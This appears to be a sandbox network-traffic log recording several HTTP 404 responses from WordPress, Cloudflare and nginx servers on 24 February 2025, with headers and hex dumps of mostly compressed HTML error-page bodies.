                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Mon, 24 Feb 2025 09:26:29 GMTserver: LiteSpeed (brotli-compressed response body omitted)
                Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Mon, 24 Feb 2025 09:26:32 GMTserver: LiteSpeed (brotli-compressed response body omitted)
33 5f 01 d1 b8 26 12 45 06 ba d5 11 be 07 4b 73 8f 9b 65 91 16 69 94 07 e9 43 53 b4 cf 69 aa 48 4b 1f a0 48 01 7c 85 45 ba b8 94 99 3c 2f d2 eb e5 f1 7a 59 a4 54 50 38 22 cd e9 9a 1a 07 83 a0 71 df c0 cc 88 fb e6 96 1b f7 cd f3 b7 03 e3 7e 7e be 0f 25 d0 7c a0 a5 77 a5 46 52 24 cd 70 31 99 f4 48 91 1e ba b9 30 89 16 e9 5d dc 08 e4 6f fe 3c 80 05 1d 41 b6 c6 c9 bb f8 70 0f 41 5d c9 6b b9 a4 e3 b8 9a a4 a7 d3 f1 1f 5e 59 6d 2c 10 13 89 ee d1 cf c7 19 68 18 2a 72 9a 4e a6 0d 89 16 c9 8c 70 7c d8 eb 40 bc 88 02 56 fb 9a 26 25 03 3e 60 b8 df 9f 83 6a 18 23 b1 a5 6f 10 31 e6 20 52 a4 48 2e f7 d3 b9 9c 52 ef 93 f0 b1 66 7c 5c 45 88 d1 78 f7 15 7d d0 0d c8 08 f8 1a a1 65 5e bc f9 fa f1 83 8c 18 8c 6b 4c 7d cf 90 f3 51 c0 e7 0c e3 48 42 6d 3b 06 02 85 e3 03 c8 91 ae 57 e0 0b 94 c8 32 91 09 90 a5 76 7b 1d 65 dc d6 9b d4 30 99 2b c4 05 c8 da 58 fb 0d 8e c8 50 64 22 e3 2b 47 7c 4f 3b 38 90 ef c6 e1 f9 f2 71 08 fa 9e 81 6c 00 5f b7 ba 81 67 1a 35 f8 37 29 Data Ascii: 1b20{'C)7dy6r;Xz"Pv2?[UsVj
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"content-length: 6943content-encoding: brvary: Accept-Encodingdate: Mon, 24 Feb 2025 09:26:35 GMTserver: LiteSpeedData Raw: 22 f7 2e a2 aa d6 43 00 1a 29 0b e7 ef f7 b7 37 cd ef f8 e7 0b d3 19 19 12 8c 64 e7 1c 79 f1 1e c7 d5 36 72 3b 58 7a 92 c9 22 50 e1 c9 76 aa d5 df 32 ad 3f 5b 55 73 b8 bf 56 6a ca cb 80 04 48 bb 13 cf ba f7 f2 b7 ee 2e 0f 16 48 26 41 82 0f c8 96 27 95 e3 e1 5f ae ff ff df af 32 1f 44 21 23 13 1f 3b e9 00 82 22 56 f7 81 28 12 4d 02 45 f5 a4 03 dc dd 03 78 df bd ef ff 5f bf 1a 78 18 49 46 12 74 07 88 16 6c 8c a8 71 0b 24 63 f7 ac 31 bb de b1 da c7 50 7d 6d 77 ba fd 44 01 51 11 35 be d8 28 01 2d ad 27 93 07 3b 6c ed f4 55 53 14 7d 99 35 b8 f9 f7 af 94 ae 27 84 10 d2 4a 24 44 be 6c a0 d8 c0 5e cc 0e 5b bb 22 e5 4e 87 08 a8 7a 8e 27 e1 8d 00 a7 5b 50 94 b6 8f f5 ad 46 70 64 4e de 1b 67 5a 6d c9 13 eb 9b 91 18 c2 84 c7 af 15 f2 ea db fb 77 e4 db 0e 5a 00 af 02 33 7e 55 bd bc fb 14 6b ca 09 d2 11 7d 8b f3 58 6a 0b 6a 21 c2 a7 da 68 10 df 6f 6b dc 2f 52 e7 f2 0b 16 f3 34 2d 2b 27 ef 62 05 d6 ec 83 74 80 a9 eb da 34 40 6b 8e a6 f4 ee d1 85 5c c8 2c ad bd c3 b8 c7 27 d7 c7 40 fb 5e 28 e5 fe 5b 41 83 16 d6 9f 74 03 c4 79 24 93 80 1d 87 e4 8f 9b e5 62 b1 22 03 00 77 f1 49 e3 6e 60 37 b3 1a ad a5 59 f0 5b 8f 71 c6 ce 59 cd 5a 7d 9c 9b 56 37 30 ef a4 be 4d 38 e4 ab 7b cc 3f 23 e9 7a 72 f2 80 84 0d 58 9b b6 c9 4d 64 b7 d1 fc 0f 51 51 dd a3 a7 c4 6c 04 d9 1a fc e7 da 94 a0 c4 6c 38 19 bc 6a fd b4 71 73 e3 30 18 17 4d 39 8f e6 7f c8 c9 79 96 65 dd 91 2c 2e ff d4 c2 c7 ac de ea 63 56 b9 38 5f f6 7e 2e 96 bb 19 3b e7 3b 4b d3 2e 98 16 3a 8d 3b e9 00 c9 b3 0a b3 b0 a7 21 ba 9e a4 a7 44 22 75 45 4e d3 c9 a2 f7 37 f2 df 43 07 ad bf 33 5f 01 d1 b8 26 12 45 
06 ba d5 11 be 07 4b 73 8f 9b 65 91 16 69 94 07 e9 43 53 b4 cf 69 aa 48 4b 1f a0 48 01 7c 85 45 ba b8 94 99 3c 2f d2 eb e5 f1 7a 59 a4 54 50 38 22 cd e9 9a 1a 07 83 a0 71 df c0 cc 88 fb e6 96 1b f7 cd f3 b7 03 e3 7e 7e be 0f 25 d0 7c a0 a5 77 a5 46 52 24 cd 70 31 99 f4 48 91 1e ba b9 30 89 16 e9 5d dc 08 e4 6f fe 3c 80 05 1d 41 b6 c6 c9 bb f8 70 0f 41 5d c9 6b b9 a4 e3 b8 9a a4 a7 d3 f1 1f 5e 59 6d 2c 10 13 89 ee d1 cf c7 19 68 18 2a 72 9a 4e a6 0d 89 16 c9 8c 70 7c d8 eb 40 bc 88 02 56 fb 9a 26 25 03 3e 60 b8 df 9f 83 6a 18 23 b1 a5 6f 10 31 e6 20 52 a4 48 2e f7 d3 b9 9c 52 ef 93 f0 b1 66 7c 5c 45 88 d1 78 f7 15 7d d0 0d c8 08 f8 1a a1 65 5e bc f9 fa f1 83 8c 18 8c 6b 4c 7d cf 90 f3 51 c0 e7 0c e3 48 42 6d 3b 06 02 85 e3 03 c8 91 ae 57 e0 0b 94 c8 32 91 09 90 a5 76 7b 1d 65 dc d6 9b d4 30 99 2b c4 05 c8 da 58 fb 0d 8e c8 50 64 22 e3 2b 47 7c 4f 3b 38 90 ef c6 e1 f9 f2 71 08 fa 9e 81 6c 00 5f b7 ba 81 67 1a 35 f8 37 29 59 69 d4 5c 04 c5 e8 da d3 fd 46 08 Data Ascii: ".C)7dy6r;Xz"Pv2?[Us
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:26:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lsNE0RNy7jVf%2BFTI911vHn5%2BNHOMwKCgVY3octM7835ssH5XQPy%2Fd7CpovI24IDtvErgeB4KgW3V7ACMI7Xh6lHEWsON2gD9OXiKlMGFCqqFLKpNX896pGgX%2BBc%2FkMSzkR7Z0Z2jKUyKlZ0Lig%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916e6a773b687d1c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1762&rtt_var=881&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=717&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a 31 32 66 36 0d 0a cc 5a d9 76 a3 4c 92 be ef a7 d0 b8 cf cc 74 1f ca c5 be f9 b7 6b 06 10 12 48 02 01 12 92 d0 4d 9f 04 92 45 ac 62 97 e6 f4 03 cd 6b cc 93 cd 91 ed aa df 65 4b 55 f5 77 cf c5 e4 85 45 66 46 44 46 c6 f2 05 ce e4 f1 5f c6 4b 69 ed 18 f2 28 6a b2 f4 cb 9f 1e 5f 7e 46 a3 d1 e8 31 82 c0 7f 7d cc 60 03 46 51 d3 94 f7 f0 d8 c6 dd d3 9d 54 e4 0d cc 9b fb e6 54 c2 bb 91 f7 d2 7b ba 6b e0 d0 a0 17 11 bf 8d bc 08 54 35 6c 9e da 26 b8 e7 ee 6e ca 01 5e 04 ef 2f fc 55 91 be 11 94 17 f7 de 65 ea 26 a3 51 81 30 03 7f 84 43 1e ca b8 82 f5 1b 16 ec 3b da 1c 64 f0 e9 ae 8b 61 5f 16 55 f3 86 ac 8f fd 26 7a f2 61 17 7b f0 fe b9 f3 69 14 e7 71 13 83 f4 be f6 40 0a 9f f0 cf df 44 35 71 93 c2 2f 14 46 8d f4 a2 19 4d 8a 36 f7 1f d1 97 c1 17 82 ba 39 a5 70 74 b1 db ab b9 bc ba 7e 65 be 34 b7 f0 4f a3 ff fa d6 bd b4 a0 c8 9b fb 00 64 71 7a 7a 18 09 55 0c d2 4f 23 05 a6 1d 6c 62 0f 7c 1a d5 20 af ef 6b 58 c5 c1 6f 1f d9 ea f8 0c 1f 46 38 55 Data Ascii: 
1312f6ZvLtkHMEbkeKUwEfFDF_Ki(j_~F1}`FQTT{kT5l&n^/Ue&Q0C;da_U&za{iq@D5q/FM69pt~e4OdqzzUO#lb| kXoF8U
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:26:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u44tohTyLWHEsNgKevBacQYp6EjhCJITLyoot0QtYMVN793pFLgwJs1jTGohLjhL40VzZCQfFeXZlyCsvxfOg8eWZX8XN4491pFp%2FXDzBAnuR%2Bb57Ug%2BD6M0J3flotIIb3JoFJCi2ozP4XKy9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916e6a873c4f4232-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1759&min_rtt=1759&rtt_var=879&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1734&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 59 93 a3 48 92 7e ef 5f a1 ed b5 35 9b 31 2a 87 fb ca ee 1a 5b 6e 90 04 e2 16 e8 8d 1b c4 29 6e 69 6c fe fb 9a b2 aa 7b aa b2 a4 ea ea 9d 7d d8 78 11 41 84 bb 87 bb 7f fe 79 24 f9 d3 4f 3f fd fa 1f fc 81 b3 7d 5d d8 e4 63 5d fd fd a7 5f 3f fd 6c 36 9b cd af 79 12 c4 9f 1f eb 64 0c 36 f9 38 76 2f c9 65 2a e6 8f 3f 73 6d 33 26 cd f8 32 5e bb e4 e7 4d f4 69 f6 f1 e7 31 59 47 f0 ae e2 97 4d 94 07 fd 90 8c 1f a7 31 7d a1 7e 7e aa 27 88 f2 e4 e5 2e df b7 d5 17 8a 9a f6 25 ba 2f 3d 15 d4 fb 20 ab 83 3f 23 21 ac 5d d1 27 c3 17 22 d0 57 7b 9b a0 4e 3e fe 3c 17 c9 d2 b5 fd f8 c5 b6 a5 88 c7 fc 63 9c cc 45 94 bc bc 4d 3e 6c 8a a6 18 8b a0 7a 19 a2 a0 4a 3e c2 7f fb 5d d5 58 8c 55 f2 77 0c c2 36 5a 3b 6e c4 76 6a e2 5f c1 4f 2f 3f 6d 18 c6 6b 95 6c ee 71 fb 1c ae 68 18 3e 0b df 47 d8 c6 d7 cd 3f 7e 9f de 47 da 36 e3 4b 1a d4 45 75 7d dd 30 7d 11 54 1f 36 72 52 cd c9 58 44 c1 87 cd 10 34 c3 cb 90 f4 45 fa cb b7 62 43 71 4b 5e 37 30 d6 ad 5f 2f 56 45 93 bc e4 49 91 e5 e3 eb 06 Data Ascii: 
fcbYYH~_51*[n)nil{}xAy$O?}]c]_?l6yd68v/e*?sm3&2^Mi1YGM1}~~'.%/= ?#!]'"W{N><cEM>lzJ>]XUw6Z;nvj_O/?mklqh>G?~G6KEu}0}T6rRXD4EbCqK^70_/VEI
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:26:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zkqKSuAuZfX4zmUABJTf7Q0Zdjl97Y3%2BuYLsFbd5Oaegx3PAbHbpVFFFvgGo6tVqgAlJlh11LC83A5hlXQj49YEbbm35Pc0nI0UyCwUntLVuUB8IreqXnAySJDKf5tEta0z3s7tJgqfzgveKg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916e6a971e8a4321-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13202&min_rtt=13202&rtt_var=6601&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=424&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 61 36 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 Data Ascii: 2a65<!DOCTYPE 
html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <t
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 24 Feb 2025 09:26:56 GMTContent-Type: text/htmlContent-Length: 3550Connection: closeETag: "64c9ae7b-dde"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 35 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 79 64 65 76 69 6c 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 3a 20 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 6f 62 69 65 6b 74 75 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 6f 62 69 65 6b 74 75 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 
6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 37 33 37 33 37 33 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 7d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 24 Feb 2025 09:26:59 GMTContent-Type: text/htmlContent-Length: 3550Connection: closeETag: "64c9ae7b-dde"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 35 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 79 64 65 76 69 6c 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 3a 20 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 6f 62 69 65 6b 74 75 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 6f 62 69 65 6b 74 75 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 
6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 37 33 37 33 37 33 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 7d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 24 Feb 2025 09:27:01 GMTContent-Type: text/htmlContent-Length: 3550Connection: closeETag: "64c9ae7b-dde"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 35 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 79 64 65 76 69 6c 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 3a 20 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 6f 62 69 65 6b 74 75 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 6f 62 69 65 6b 74 75 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 
6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 37 33 37 33 37 33 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 7d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20
